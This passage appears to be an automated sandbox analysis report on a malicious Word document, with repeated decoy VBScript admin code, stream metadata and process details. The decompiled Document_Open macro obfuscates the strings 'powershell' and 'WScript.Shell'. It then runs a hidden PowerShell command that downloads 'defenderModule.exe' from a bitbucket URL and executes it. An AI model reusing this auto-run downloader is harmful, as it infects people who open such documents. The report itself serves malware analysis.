    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    Const ForReading = 1
    
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objtextFile = objFSO.OpenTextFile("C:\Windows\System32\DHCP\" &  "DhcpSrvLog-Mon.log", ForReading)
    
    Wscript.Echo vbCrLf & "DHCP Records"
    
    Do While objtextFile.AtEndOfStream <> True
      strLine = objtextFile.ReadLine
      If InStr(strLine, ",") Then
        arrDHCPRecord = Split(strLine, ",")
        Wscript.Echo vbCrLf & "Event ID: " & arrDHCPRecord(0)
        Wscript.Echo "Date: " & arrDHCPRecord(1)
        Wscript.Echo "Time: " & arrDHCPRecord(2)
        Wscript.Echo "Description: " & arrDHCPRecord(3)
        Wscript.Echo "IP Address: " & arrDHCPRecord(4)
        Wscript.Echo "Host Name: " & arrDHCPRecord(5)
        Wscript.Echo "MAC Address: " & arrDHCPRecord(6)
        i = i + 1
      End If
    Loop
    
    Wscript.Echo vbCrLf & "Number of DHCP records read: " & i
    
    
    
    
    
    
    
    
    End Sub
    
    
    Private Sub maisLixo()
    
    
    
    
    
    ' Delegate the Allowed to Authenticate Extended Right for an Entire OU
    
    
    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5
    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1
    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2
    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100
    Const ADS_ACEFLAG_INHERIT_ACE = &H2
    
    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")
    Set objSD = objSDUtil.Get("ntSecurityDescriptor")
    Set objDacl = objSD.DiscretionaryAcl
    
    Set objAce = CreateObject("AccessControlEntry")
    
    objAce.Trustee = "FABRIKAM\kmyer"
    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE
    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT
    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS
    objDacl.AddAce objAce
    
    objSD.DiscretionaryAcl = objDacl
    
    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
    objSDUtil.SetInfo
    
    
    
    
    ' List SFU Domain Information
    
    
    On Error Resume Next
    
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:"     & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")
    
    Set colItems = objWMIService.ExecQuery     ("Select * from SFU_Domain")
    
    For Each objItem In colItems
        Wscript.Echo "DC: " & objItem.DC
        Wscript.Echo "Default: " & objItem.Default
        Wscript.Echo "Domain: " & objItem.Domain
        Wscript.Echo "Key Name: " & objItem.KeyName
        Wscript.Echo "Maps: " & objItem.Maps
        Wscript.Echo
    Next
    ' Modify the Update Schedule
    
    
    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")
    Set objSettings = objAutoUpdate.Settings
    
    objSettings.ScheduledInstallationDay = 3
    objSettings.ScheduledInstallationTime = 4
    
    objSettings.Save
    
    
    
    ' List Domain Information Using WMI
    
    
    On Error Resume Next
    
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:"     & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    
    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")
    
    For Each objItem In colItems
        Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
        Wscript.Echo "DC Site Name: " & objItem.DcSiteName
        Wscript.Echo "Description: " & objItem.Description
        Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
        Wscript.Echo "Domain Controller Address: " &         objItem.DomainControllerAddress
        Wscript.Echo "Domain Controller Address Type: " &         objItem.DomainControllerAddressType
        Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
        Wscript.Echo "Domain GUID: " & objItem.DomainGuid
        Wscript.Echo "Domain Name: " & objItem.DomainName
        Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
        Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
        Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
        Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
        Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
        Wscript.Echo "DS Kerberos Distribution Center Flag: " &         objItem.DSKerberosDistributionCenterFlag
        Wscript.Echo "DS Primary Domain Controller Flag: " &         objItem.DSPrimaryDomainControllerFlag
        Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
        Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
        Wscript.Echo "Name: " & objItem.Name
        Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
        Wscript.Echo
    Next
    
    
    
    
    
    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5
    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1
    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2
    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100
    Const ADS_ACEFLAG_INHERIT_ACE = &H2
    
    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")
    Set objSD = objSDUtil.Get("ntSecurityDescriptor")
    Set objDacl = objSD.DiscretionaryAcl
    
    Set objAce = CreateObject("AccessControlEntry")
    
    objAce.Trustee = "FABRIKAM\kmyer"
    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE
    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
    objAce.Flags = ADS_FLAG_OBJECT_TYPE_PRESENT Or ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT
    objAce.ObjectType = "{68b1d179-0d15-4d4f-ab71-46152e79a7bc}"
    objAce.InheritedObjectType = "{BF967ABA-0DE6-11D0-A285-00AA003049E2}"
    objAce.AccessMask = ADS_RIGHT_DS_CONTROL_ACCESS
    objDacl.AddAce objAce
    
    objSD.DiscretionaryAcl = objDacl
    
    objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
    objSDUtil.SetInfo
    
    
    
    
    ' List SFU Domain Information
    
    
    On Error Resume Next
    
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:"     & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\sfuadmin")
    
    Set colItems = objWMIService.ExecQuery     ("Select * from SFU_Domain")
    
    For Each objItem In colItems
        Wscript.Echo "DC: " & objItem.DC
        Wscript.Echo "Default: " & objItem.Default
        Wscript.Echo "Domain: " & objItem.Domain
        Wscript.Echo "Key Name: " & objItem.KeyName
        Wscript.Echo "Maps: " & objItem.Maps
        Wscript.Echo
    Next
    ' Modify the Update Schedule
    
    
    Set objAutoUpdate = CreateObject("Microsoft.Update.AutoUpdate")
    Set objSettings = objAutoUpdate.Settings
    
    objSettings.ScheduledInstallationDay = 3
    objSettings.ScheduledInstallationTime = 4
    
    objSettings.Save
    
    
    
    ' List Domain Information Using WMI
    
    
    On Error Resume Next
    
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:"     & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    
    Set colItems = objWMIService.ExecQuery("Select * from Win32_NTDomain")
    
    For Each objItem In colItems
        Wscript.Echo "Client Site Name: " & objItem.ClientSiteName
        Wscript.Echo "DC Site Name: " & objItem.DcSiteName
        Wscript.Echo "Description: " & objItem.Description
        Wscript.Echo "DNS Forest Name: " & objItem.DnsForestName
        Wscript.Echo "Domain Controller Address: " &         objItem.DomainControllerAddress
        Wscript.Echo "Domain Controller Address Type: " &         objItem.DomainControllerAddressType
        Wscript.Echo "Domain Controller Name: " & objItem.DomainControllerName
        Wscript.Echo "Domain GUID: " & objItem.DomainGuid
        Wscript.Echo "Domain Name: " & objItem.DomainName
        Wscript.Echo "DS Directory Service Flag: " & objItem.DSDirectoryServiceFlag
        Wscript.Echo "DS DNS Controller Flag: " & objItem.DSDnsControllerFlag
        Wscript.Echo "DS DNS Domain Flag: " & objItem.DSDnsDomainFlag
        Wscript.Echo "DS DNS Forest Flag: " & objItem.DSDnsForestFlag
        Wscript.Echo "DS Global Catalog Flag: " & objItem.DSGlobalCatalogFlag
        Wscript.Echo "DS Kerberos Distribution Center Flag: " &         objItem.DSKerberosDistributionCenterFlag
        Wscript.Echo "DS Primary Domain Controller Flag: " &         objItem.DSPrimaryDomainControllerFlag
        Wscript.Echo "DS Time Service Flag: " & objItem.DSTimeServiceFlag
        Wscript.Echo "DS Writable Flag: " & objItem.DSWritableFlag
        Wscript.Echo "Name: " & objItem.Name
        Wscript.Echo "Primary Owner Contact: " & objItem.PrimaryOwnerContact
        Wscript.Echo
    Next
    
    
    
    
    
    
    Const ADS_ACETYPE_ACCESS_ALLOWED_OBJECT = &H5
    Const ADS_FLAG_OBJECT_TYPE_PRESENT = &H1
    Const ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT = &H2
    Const ADS_RIGHT_DS_CONTROL_ACCESS = &H100
    Const ADS_ACEFLAG_INHERIT_ACE = &H2
    
    Set objSDUtil = GetObject("LDAP://OU=Finance, DC=fabrikam,DC=Com")
    Set objSD = objSDUtil.Get("ntSecurityDescriptor")
    Set objDacl = objSD.DiscretionaryAcl
    
    Set objAce = CreateObject("AccessControlEntry")
    
    objAce.Trustee = "FABRIKAM\kmyer"
    objAce.AceFlags = ADS_ACEFLAG_INHERIT_ACE
    objAce.AceType = ADS_ACETYPE_ACCESS_ALLOWED_OBJECT
    objAce.Flags = AD

    Streams

    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 375
    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:375
    Entropy:5.33453038431
    Base64 Encoded:True
    Data ASCII:I D = " { 4 B 2 8 A 7 6 7 - B 5 4 8 - 4 D 2 4 - A 9 8 A - 1 4 F C 9 1 C 9 5 E 7 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 E 1 C F E E 2 0 2 1 E 2 4 2 2 2 4 2 2 2 4 2 2 2 4 2 2 " . . D P B = " 3 C 3 E D C 0 0 E 4 1 F E 5 1 F E 5 1 F " . . G C = " 5 A 5 8 B A 2 6 D 9 2 7 D 9 2 7 2 6 " . . . . [ H o s t E x t e n d e r I n f
    Data Raw:49 44 3d 22 7b 34 42 32 38 41 37 36 37 2d 42 35 34 38 2d 34 44 32 34 2d 41 39 38 41 2d 31 34 46 43 39 31 43 39 35 45 37 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
    Stream Path: PROJECTwm, File Type: data, Stream Size: 41
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:41
    Entropy:3.07738448508
    Base64 Encoded:False
    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 7060
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:7060
    Entropy:5.55925901598
    Base64 Encoded:True
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
    Data Raw:cc 61 af 00 00 01 00 ff 16 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
    Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 523
    General
    Stream Path:VBA/dir
    File Type:VAX-order 68K Blit (standalone) executable
    Stream Size:523
    Entropy:6.29824308961
    Base64 Encoded:True
    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . 0 . . a . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . . a .
    Data Raw:01 07 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 30 93 d7 61 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    General

    Start time:08:51:40
    Start date:27/12/2020
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
    Imagebase:0x13f990000
    File size:1424032 bytes
    MD5 hash:95C38D04597050285A18F66039EDB456
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    Disassembly

    Call Graph

    Graph

    Module: ThisDocument

    Declaration
    LineContent
    1

    Attribute VB_Name = "ThisDocument"

    2

    Attribute VB_Base = "1Normal.ThisDocument"

    3

    Attribute VB_GlobalNameSpace = False

    4

    Attribute VB_Creatable = False

    5

    Attribute VB_PredeclaredId = True

    6

    Attribute VB_Exposed = True

    7

    Attribute VB_TemplateDerived = True

    8

    Attribute VB_Customizable = True

    Executed Functions
    APIsMeta Information

    Part of subcall function xwygun72@ThisDocument: p_

    Part of subcall function xwygun72@ThisDocument: UBound

    Part of subcall function xwygun72@ThisDocument: LBound

    Part of subcall function xwygun72@ThisDocument: UBound

    Chr

    Replace

    Replace

    Replace

    CreateObject

    Part of subcall function vw823nw7@ThisDocument: p_

    Part of subcall function vw823nw7@ThisDocument: UBound

    Part of subcall function vw823nw7@ThisDocument: LBound

    Part of subcall function vw823nw7@ThisDocument: UBound

    Chr

    exec

    StringsDecrypted Strings
    "w"""h"""p""bu"t"ob"""k"k")"b"\x7f""b""""
    " /W hidden /C $TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe',$TempDir+'defenderModule.exe');Start-Process 'defenderModule.exe'"
    "aower"
    "sheaa"
    ".axa"
    "a"
    "p"
    "a"
    "l"
    "a"
    "e"
    "S""W""g""v""m""tp"*"W"""l""""a""h"""h"""
    LineInstructionMeta Information
    4320

    Private Sub Document_Open()

    4322

    Dim stra as String

    executed
    4323

    stra = xwygun72(Chr(119) & "" & "h" & "" & Chr(112) & "" & Chr(98) & Chr(117) & "t" & Chr(111) & Chr(98) & "" & "k" & Chr(107) & ")" & Chr(98) & "\x7f" & "b" & "")

    Chr

    4325

    Dim str as String

    4326

    str = " /W hidden /C $TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/defenderModule.exe',$TempDir+'defenderModule.exe');Start-Process 'defenderModule.exe'"

    4328

    Dim st1 as String

    4329

    Dim st2 as String

    4330

    Dim st3 as String

    4332

    st1 = "aower"

    4333

    st2 = "sheaa"

    4334

    st3 = ".axa"

    4337

    Dim str1 as String

    4338

    Dim str2 as String

    4339

    Dim str3 as String

    4341

    str1 = Replace(st1, "a", "p")

    Replace

    4342

    str2 = Replace(st2, "a", "l")

    Replace

    4343

    str3 = Replace(st3, "a", "e")

    Replace

    4346

    Dim ws2asd as Object

    4347

    Set ws2asd = CreateObject(vw823nw7(Chr(83) & "" & Chr(87) & "" & Chr(103) & "" & Chr(118) & "" & Chr(109) & "" & Chr(116) & Chr(112) & "*" & Chr(87) & "" & "l" & "" & "a" & "h" & "" & Chr(104) & ""))

    CreateObject

    Chr

    4348

    ws2asd.exec (str1 + str2 + str3 + str)

    exec

    4350

    End Sub

    Non-Executed Functions
    APIsMeta Information

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

    Echo

    DcSiteName

    Echo

    Description

    Echo

    DnsForestName

    Echo

    DomainControllerAddress

    Echo

    DomainControllerAddressType

    Echo

    DomainControllerName

    Echo

    DomainGuid

    Echo

    DomainName

    Echo

    DSDirectoryServiceFlag

    Echo

    DSDnsControllerFlag

    Echo

    DSDnsDomainFlag

    Echo

    DSDnsForestFlag

    Echo

    DSGlobalCatalogFlag

    Echo

    DSKerberosDistributionCenterFlag

    Echo

    DSPrimaryDomainControllerFlag

    Echo

    DSTimeServiceFlag

    Echo

    DSWritableFlag

    Echo

    Name

    Echo

    PrimaryOwnerContact

    Echo

    GetObject

    Get

    DiscretionaryAcl

    CreateObject

    Trustee

    AceFlags

    ADS_ACEFLAG_INHERIT_ACE

    AceType

    ADS_ACETYPE_ACCESS_ALLOWED_OBJECT

    Flags

    ADS_FLAG_OBJECT_TYPE_PRESENT

    ADS_FLAG_INHERITED_OBJECT_TYPE_PRESENT

    ObjectType

    InheritedObjectType

    AccessMask

    ADS_RIGHT_DS_CONTROL_ACCESS

    AddAce

    DiscretionaryAcl

    Put

    Array

    SetInfo

    GetObject

    ExecQuery

    Echo

    DC

    Echo

    Default

    Echo

    Domain

    Echo

    KeyName

    Echo

    Maps

    Echo

    CreateObject

    Settings

    ScheduledInstallationDay

    ScheduledInstallationTime

    Save

    GetObject

    ExecQuery

    Echo

    ClientSiteName

